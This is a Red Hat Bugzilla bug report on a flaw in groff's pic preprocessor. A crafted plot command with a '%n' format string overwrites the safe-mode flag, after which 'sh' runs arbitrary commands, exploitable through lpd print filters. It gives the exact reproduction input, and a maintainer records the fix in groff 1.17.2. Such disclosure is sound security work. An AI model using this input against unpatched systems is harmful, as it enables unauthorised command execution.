Red Hat Bugzilla – Bug 50494
pic can be forced to run commands in safe mode
Last modified: 2007-04-18 12:35:20 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.2) Gecko/20010701
Description of problem:
pic can be forced to execute commands (sh X..X) when running in safe mode
(-S). Can be exploited trough lpd (groff/pic is run in printfilters) and
arbitrary commands with id of lpd can be run.
pic command 'plot -1.99892428527521803794 "%n"' will overwrite memory
where safe mode variable is stored and then it alows to use "sh" command.
Steps to Reproduce:
1. pic -S
3. plot -1.99892428527521803794 "%n"
4. sh XidX
Actual Results: uid=501(bendik) gid=501(bendik) ....
Expected Results: pic:<standard input>:2: unsafe to run command `id'
Bug has been discovered by Zenith Parsec <email@example.com>.
Exploit with patch has been posted to bugtraq (see URL).
I tested groff 1.16 and 1.16.1, both are vulnerable.
When you want to fix this????
is fixed with current rpms: groff-1.17.2-1
Florian La Roche